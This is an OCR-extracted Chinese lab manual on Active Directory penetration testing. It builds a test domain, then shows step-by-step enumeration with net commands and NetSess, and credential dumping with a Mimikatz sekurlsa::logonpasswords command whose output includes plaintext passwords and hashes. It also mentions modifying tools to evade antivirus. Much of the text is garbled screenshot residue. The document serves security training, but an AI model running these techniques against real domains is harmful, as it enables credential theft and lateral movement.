2022域渗透从入门防护.docx

《2022域渗透从入门防护.docx》由会员分享，可在线阅读，更多相关《2022域渗透从入门防护.docx（41页珍藏版）》请在课桌文档上搜索。

1、域渗透从入门防护手册前期准备-XX-刖言本系列在于从简单的WindoWS域环境搭建到利用域的特性，通过哈希传递攻击、凭证窃取技术结合互联网公布现成的安全研究工具，进行域横向移动渗透，最终到达我们目标，拿到ad域控制器权限。实验环境设置下面列出本次实验环境计算机跟练习中的一些配置设置.，均在VMWARE下完成。我们的域名将被命名为h4x0er.org公司，因此创建域，然后将这些PC电脑加入域，letsgo!至次实验环Q共有三自四脑,二自AD域控制器DC,区外两自员工PCFQDN操作系统IP地址描述DC1.h4xOer.orgWindowsServer2012192.168.10.10域控制器/D

2、NS服务器Admins-PC.h4x0er.orgWindows7Enterprise192.168.10.21管理员PCVictims-PC.h4x0er.orgWindows7Enterprise192.168.10.22受害者PC系统ISO下载地址:系Ds:msdn.地IIVolJ.cnWindowsServer2012(DC1)1 .修改计算机名2 .修改IP地址好律及.包姓在不电源5叁EthemetOSQU绛和共享中心!并设接MO-IntewetHBf:IEtMrwOvpNfflf；*&u三叫人方.I珞向内我=*电.IOIFJ开封咯如其.2版七2。2嬴I。3 ,服务廨理器角色一添加A

3、D一路下一步，到服务器角色选择ACtiVeDireCtOry域服务，添加功能BPA姑票BPA维柔继续一路下一步，到指定备用源选择自己WirldOWSSerVer2012R2的安装光盘位置路径，这里我的光盘路径是D:sourcesxs,指定完后确定，点击安装确认安装所选内容开的NIBIe多矮2桂而月游自邑功解ADDSMJFr*mewafl9(Q).um角fMaW*e2IRflM1R8OJR0UW.可隐会在Itm1.t息三可GIWE拉工*立古上一步H；WJm套格.ActfvDctom更A蔻下IaMlra31文的胡.中日京察年职！本”,并口1.-更动0WindowsSetver安*5出城赛文蟀不是作

4、用WWr分Er).而是位于并行IHllSXS)文峥夹中.2S3但不喻/文件位于VuUnm文件中.*SXVM:E.并落初以斫从呻网戚文蜂的V4M:A$ourcJrt$uH.wro4IMEII-Sar4.安装AD域控制器回到我们服务器管理器界面，点击Ii垢丙量以I尊ADDS文杵IG/“劣添加新林，输入根域名:h4x0er.org文件J存1做务IK6PACS9BPASBPAQ*.OJWtlBPA培震TlZX侬券詈有服却)DS件和存4输入一个符合复杂度的密码，点击下一步。域数据存放位置一路下一步，安装。板Windows7(Admins-PCVictims-PC)另外两台PC配置类似1.设置计算机名2,

5、设置IP地址3,加入域控两台机器加入完域后，必须重启计算机。4关闭防火墙重启完电脑后，把所有防火墙关闭现在所有的电脑都加入了域，接下来我们添加些账号跟组到域环境当中。域账号设置在本次实验练习当中，你将看到helpdesk帮助台和域管理员之间进行分离，但其实并没有什么用，不足以防止凭证窃取。让我们创建一个helpdesk组作为安全组进行分离。组名成员描述HelpdeskPonyM用于管理h4x0er.org域客户端二ActrwMCtoeyR*WnMCIonMbWDomMnCMroHmMedRooCP32dGrwpDmAwimDmUpdtftePfoayD7三)三uXH)计皿W1.AIrvCOrg

6、cEDlfUm%lm9iMSMQl11fiJIHCemputenIjfiDo*inCeetroMmIJ2FornScurPvMMI,。MarkedS*rvkAccc,UwrsMNCRMlCEOteMIUAc%Directory用户10rfIt矶MceRgf三fyUcm32SyemAooft)flm32dMJmc*M0MCDWVfHHH0M(PATH三AComputersDofnCxtrolrtDonGmt4DomeUMfSEr4vpmAdmint也f*rpriwfUdpnly%GroupPokyCreMor(Gtmi4(ProtectedUrIlRASXdIASSekRdopltimC开始菜单

7、-运行dsa.msc-容器USerS，右击新建，点击组-输入组名HeIPDeSk-确定05SchemaAdmmsaWinRMRemOteWMIUSerS_越用户安全组本地域安全组-本地域安全年-全局安全组本地域安全锢-本地或安全组-全局安全组全局安全短全局安全组-全局安全绢-全局、-三安全组-通用安全馆-通用安全组.全局用户安全组-全息安全组本地栽安全组-全局安全Ifi-通用安全组本ft场疝在建计苴机（域）的内三帐允许格此殂中成员的密此组的成员被允许发布.可以光黑此组中作为博.不允许将此殂中成员的DNSAdministrators组允忏音其他后户茶（Jno._猎走的城苫理员须入到域中的所有工作

8、.&U所有案制器域的所有来宾所有域用户lil8三ESafi诙担的成员是企业中的这个泪中的戌员可以修.供来宾访问计算机或访此担的成员将受普针对.这个殂中的赧务St可以.此组中的成员呈城中只.三37S三SKSSMembersofthisgrou.或直接在域控服务器下以administrator权限输入命令retrouDHeIDDeSk/add/domain进行创建安全组HeIPDeSk让我们在域中创建三个用户姓名登录账号描述登录机器JackMaJackM悔创阿里JaCk马，是遭受钓鱼邮件的受害者Victims-PCPonyMaPonyM普通家庭POny马，是IT部门人员，同时也是HeIPdeSk”

9、安全组的成员。Victims-PcADMINS-PcRobin1.iRobin1.再赢一次RObin李，是域管理ADMINs-PCAD域控制器依次按照以下步骤重复新建3个用户JaCkma/PonymaZRobin1.i-ActiveDirectory用户和计算机三s用户安全组-本IlS域管理计宜机（域）的内置帐.允许将此组中成员的密.安全组-本16或此组的成员被允许发布.韧可以完座此泪中作为U.安全组本尴不允许将此犯中成员的.安全组DNSAdministrators如安全组全局允许营其他客户黄宓D.安全组短指定的域告理艮安全组短放人到域中的所有工作“安全组全身域中所有W控制器安全组韧域的所有来

10、宾安全组朔所有城用户安全甯通用企业的指定系统告理员安一i8ffl该组的成员是企业中的.安全组全局这个妲中的成员可以修用户安全组安全坦韧韧供来亮访问计n机或访.此组的成员挎受到针对.安全组本地成这个殂中的St可以安全铝-全局此组中的成员是珏中只.安全税-i8ffl36b的指整案统售理员安全组-1S3SMembersofthisgrou.类用安安安一安安安安安安安安一安安安可安安安以及添加RObin1.i到域管理员IHEU&口，；.二国网DeniedRODCPasswordReplicationG电DnSAdming电DnsUpdateProxy邕DomainAdmins飕DomainComput

11、ers电DomainControllers电DomeinGuests跑DomainUsersEnterpriseAdmins%EnterpriseRead-onlyDomainControl%GroupPolicyCreatorOwners2.Guest跑HeIpDesk&JackMa&PonyMa跑ProtectedUsers跑RASandIASServersRead-onlyDomainControllers&Robin1.i跑SchemeAdminsWinRMRemoteWMIUserse名称&Administrator%AllowedRODCPasswordReplication%Ce

12、rtPublishers跑CloneableDomainControllers环境会话I远程控制I远程里面院务国造文件ICOM常现I地址口电匚I三5j电话I口亘及愚于ISST(M):蜃中力，fMS嗝或直接在域控服务器下以adminiStrator权限输入命令netUSerJaCkMDaSSWOrd123!0#/addMOmainnetUSerPonVMDaSSWord456!#/add/domainnetUSerRObin1.DaSSWOrd789!#/add/domainnetqrouDDomainAdminisRobin1./add/domain最后创建r三个账号以及个安全组WvDirec

13、tofyMPfDttBn对了别忘记把POnyMa加入HeIPDeSk安全组文丽BmAJBtV)IMtKH)，,旬，5DT%MvXT2ActwDicetory助Wtt机3ACliVDirectory*1QkBB：WKMM3gB二Mh-JCertlHDomainCo*troUnl_JF0ri9RSc*riiyPnftdp1.I:MafdS*v.Ac:U-IAdmMftrMOf绻AlgedROOCBMSWOrde*xk(CetthbfaheMCto0C%OAdfMmAdmH4DomeinComptMr*DomeinCorrc4r*41.DomaanGutt*DomeiftUwrt4(*ep11Adm

14、ertt*frrntRdo*rDomainGroupfMicyCrMtor(Xnr&GMtqZpDT8皿皿IAonyMrccedUf*电MSMUSJmMed-crDomainComroUn&KobifIUSMmAdmmftWVMRemMeWMrUE_PonyMa三三TM:AdOmtoryMRO集S*&o*s*UtDMKWrU*eft06kuKCPOSIX厚.房中0，僧：右击POnyMa属性，隶属-添加-HelpDesk-确定或直接在域控服务器下以administrator权限输入命令netgrouphelpdeskPonyM/add/domain我们的域管理员RObin1.iFl常使用ADMI

15、NS-PC。MHelpdesk（PonyMa是其中一员）可以管理ADMINS-PC的计算机。M（三）日圆tfAdmiristretOCBackupOp*Cryp09fpDntributedEvn1.09房GUestS套EISJUSRSINetworkCcJPeHormencjPeHormanoPowerUsenRemoteDRUxUmW三三t1WlW7mQH3I38黑潮颔期用由修定&出讲中,。，赞：搜索对应组inistratorsupOp*rmanc”Usericator描述Administrators尾性常规AdministratorsSii择作(P)计算mt不制的CJ管理员对计算机/域有不

16、爰限IWB烷全访i可权成员m)友Ainistrtor电MXOERUManAdninx输入域账号密码，确定ptograptributed.IUSRStworkCcformancformancverUsernoteDetjicator?rs接着JaCkMa以及HeIPDeSk将被添加到他的个人终端电脑(VICTIMS-PC)管理员权限徐计箕机售锋(本地)J耨亲KTJl0任务计划程序Q事件互看SS函共享文件夹,用户坦f端舒清理器包带W迪管理备服务和应用程序管理员对计算亚有不受隔制的.giBd%-7=q三e3不1&令3担匙Admini更:1.将在VlCTlMS-PC电脑上安装以下工具，文件存储于C:T

17、oolsMimikatz:https:PowerSpIoit:https:QithUPsExec:https:NetSess.exe:htto:WWWjOeWfreetoolstoolsnetsessindex.htm2.注意本次实验练习过程，需关闭防病毒软件，这些工具仅供测试使用。另外相关的软件源码属于开源的，攻击者可以根据源码，针对病毒库内特征码进行二次开发以躲避杀毒软件的查杀。会计百机管理文件(F)操作（八）SS(V)帮助（三）XlE)x1B(D名称亳AdministratorsBackup0pnslookupDNSrequesttimedout.timeoutwas2seconds.默

18、认服务器:UnKnownAddress：192.168.10.10Is-dh40ei.ogCUnKnown*无法列出域h4x0er.org：QueryrefusedDNS眼舞器胆绸将区域b40er.org传送到您的计算机。如果这不正确,请检查IP地址192.168.10.10的DNS服务器上h4x0er.org的区钻传送安全设置。幸运的是，我们的DNS配置为默认阻止此DNS针对域进行转储。但如果不当的配置将会导致DNS域传送泄露漏洞，任何匿名用户都可以获取DNS服务器对应域的所有记录，直接把企业域内基础服务跟网络架构暴露，从而造成严重信息泄露，导致攻击者可利用相关信息进行下一步的渗透。目录服务

19、枚举安全帐户管理器远程协议（SAMR）为域中的用户和组提供管理功能。了解用户、组和权限之间的关系对于攻击者来说非常重要。任何经过身份验证的用户都可以执行这些命令。枚举所有的用户和组列举用户和组对攻击者非常有用。知道用户名和组名会很方便。作为一名攻击者，你要尽可能多地收集信息，毕竟这是侦察阶段。2 .行动：枚举用户和组使用JaCkM帐户，登录到VICTlMS-PC上，并尝试使用以下命令拉取所有域用户和组:netuser/domainnetgroup/domainSnC:Windows5ystem32cmd.exe这项请求将在域h4x0er.org的域控制器处理。：XUsersXJackMnetu

20、ser/domainDC1.h40er.org的用户帐户Adninist*atorkvbtgt命令成功完成。GuestPonyMJackMRobin1.这些操作都属于普通用户使用合法座而以证彳j的操作，现在攻击者已经了解域中所有用户和组信息。枚举高特权用户攻击者现在同时拥有用户列表和组列表。但知道谁在哪个组中也很重要，特别是对于企业管理员EnterpriseAdminS和域管理员DomainAdrninS这样的高特权组。我们就这样3 .行动：枚举域管理员在VleTlMS-PC上以JaCkM的身份运行以下命令：netgroupdomainadmins/domainC：MJsersJackMnet

21、groupdomainad11ins*Zdonain这项请求将在播i4xtier.ry的域拄制处I里。组名DomainAdmins注曙指定的域管理员成员AdministratorRobin1.命寺成功完成。fc：MJsersJackM1攻击者现在拥有所有用户和组，并知道哪些用户属于特权域管理员DomainAdminS”组。攻击者不会就此停止进攻，他们知道企业管理员和域管理员之间没有安全边界，因此他们也会获取企业管理员列表。4 .行动：枚举企业管理员要获取此企业管理员组的成员，请在VlCTlMS-PC上运行以下命令:netgroupenterpriseadmins/domainC：MJsersS

22、Jackbnetgroupenterpriseadmins/domain这项请求将在域F4x0eg的域控制器处理。Z且名EnterpriseAdmins注程企业的指定系统管理员成员KF=m=Administrator京令成功元成。C:MJsersJackM在企业管理员组中有一个帐户不太有趣，因为它只是默认设置，但攻击者在JaCkM帐户中获取更多的信息，并已识别他们最想攻击的用户是谁。SMB会话枚举攻击者知道他们愿意为获得最大的凭据而想妥协的人，但是他们并不完全知道如何对那些凭据进行妥协，对叭？SMB枚举可以为暴露这些非常有趣的帐户的位置，给攻击者提供精确的位置。所有经过身份验证的用户必须连接到

23、域控制器以处理组策略（针对SYSVo1.）,从而使SMB枚举成为攻击者的重要工具。这使域控制器成为执行SMB枚举的主要目标5.行动：对DC执行SMB会话枚举若要枚举连接到特定计算机的用户，在这种情况下，请转到VlCTlMS-PC上的NeteSS本地保存的位置并运行以下命令：NetSess.exedd.h4x0er.orgC：ToolsNetSessNetSess.eedel.JHxBer.OrgNetSessU02.00.00cppJoeRichardsCjoeOJanUary2004EnumeratingHost：del.h40er.orgClientUserNaneTimeIdleTi11

24、e192.168.10.21Robin1.000:00:24000:00:011.92.168.10.22JackM000:00:07000:00:00Totalof2entriesenumeratedC:Tools3etSess-根据前面的信息我们已经知道Robin1.是域管理员，现在通过SMB会话枚举，攻击者得知RObin1.的IP地址(192.168.10.21)横向移动仅需采取几个步骤，您就已经可以获得很多信息。至此，目标变成r您发现的IP地址：192.168.10.21(公开了RObin1.的计算机凭据)。枚举在内存中的凭据ViCtim-Pe不仅具有JaCkM的凭据，而且还有许多其他

25、帐户可能对攻击者有用。我们来列举一下ViCtim-PC上的内存中凭据。幸运的是，有一个用于此目的的工具：Mimikatzc6 .行动：从VICTlMSPC转储凭据从VICTlMS-PC上以管理员权限运行命令提示符，转到保存MimikatZ的工具文件夹，并执行以下命令：mimikatz.exeprivilege:debugsekurlsa:logonpasswords*exitc:WICTIMS-PC.txt上面的命令将执行Mimikatz,然后在内存中获取凭据。这个工具会把它写进一个名为“VICTIMS-PC.txt”的文本文件”.打开“VICTIMS-PC.txt”文件“看看你能找到什么。7

26、 .行动：解析MimikatZ的凭证转储输出使用记事本打开文件“VICTIMS-PC.txt。如果你的文件，看起来不像这个例子，是因为不同的密码或使用的操作系统可能不同，以及默认密码策略设置为开/关。victim-pc-记事本文件(F)浦雷(E)格式(。)M(V)带助（三）AuthenticationId;1012889(00000000:00074997UserName:JackM|1.uiimlneH4X0Er1.ogonServer：DCl1.ogonTime:2020/6/2215:07:39SID:S-I-5-21-4099049085-561315731-220585723-111

27、0Primary:JackM:H4X0ERI8cbbbea6034f5c9ea6bc4eb980efec4dJ9cc902IDSV：00000003*Username*Domain*1.M*h1.M*SHAltspkg:*Username:JackM)nnAinH4YERS*Password:passwordl23l#*1.Jsername:JackM*Domain:H4X0ER*Password：PaSSWc)rdl23!#kerberos:*Username:JackM*Domain:H4X0ER.ORG*Password:PaSsWOrd123!#ssp：crednan：victim*p

28、c记事本:Servicefrom0：VICTHS-Pa:MXOER:(null):2020/6/1017:15:47:S-I-5-20AuthenticationId:0;996(00000000三000003e4)SessionUserNameDomain1.ogonServer1.ogonTimeSID11v:I*Usemane:VICTI1S-PC3IOTI.I*SHItspkg:digest:*UsemaneDomain:7KgIf力地力1曲闪女1d9yljeH*SH,).=-01.=4s=al4QXWPMhJ=FWS11G61j52=zEH72!REIyk5f51hkerberos:

29、“Usemane:ViCtinS-P$ Doroin:刖XoERoRG Password:FRFfyQ)l?yv,CG,X,(JSlTYtf-Q%Ty,VHtPFWSnG61j52=zEl$72!REIyk5fnetuserPonyMZdonain这项请求将在域h4x0er.org的域控制器处理。码释讣注蝠用期名臂哥户拿户备户汪用PonyMPonyMa000系统默认值）Ves上需密需用允登用主上置期更机替可密可次码码要户的录登许吾目次工杳2020/6/2215:06:572020/8/315:06:572020/6/2315:06:57VesVesAll2020/6/2216:17:34可允许的登录小时数All从不DomainUsersHIelpDesk.地组成员局组麻员.令成功完成。：XUsersJackMa1攻击者将得知PonyM是HelPDeSk帮助台的成员CPOnyM的帐户对攻击者来说很有趣。但是，还需要进一步的分析，以查看该帐户是否在其他计算机上具有管理员权限。毕竟，使用它横向移动到另一台计算机上却发现它的权限比攻击者已经拥有的权限低是没有意义的